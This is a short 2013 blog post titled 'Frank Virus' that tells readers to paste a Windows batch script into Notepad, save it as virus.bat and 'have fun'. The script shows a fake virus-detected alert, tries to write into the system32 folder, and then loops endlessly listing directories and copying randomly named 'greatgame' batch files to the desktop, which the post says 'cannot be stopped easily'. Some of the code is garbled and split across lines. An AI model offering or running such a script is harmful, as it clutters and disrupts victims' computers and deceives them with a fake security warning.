Monday, 30 September 2013

Frank Virus

  1. Open notepad

  2. Type the following code in:

@echo off
echo checking system:
echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
Pause
echo DELETING VIRUS
pause
:1
dir /s
copy c:\tmp.bat
c:\docum~1\%username%\desktop\greatgame_%random%.bat

goto 1

  1. This will create a never ending stream of mindless code. This cannot be stopped easily.

  2. Save the file as "virus.bat"

  3. Have fun

No comments:

Post a Comment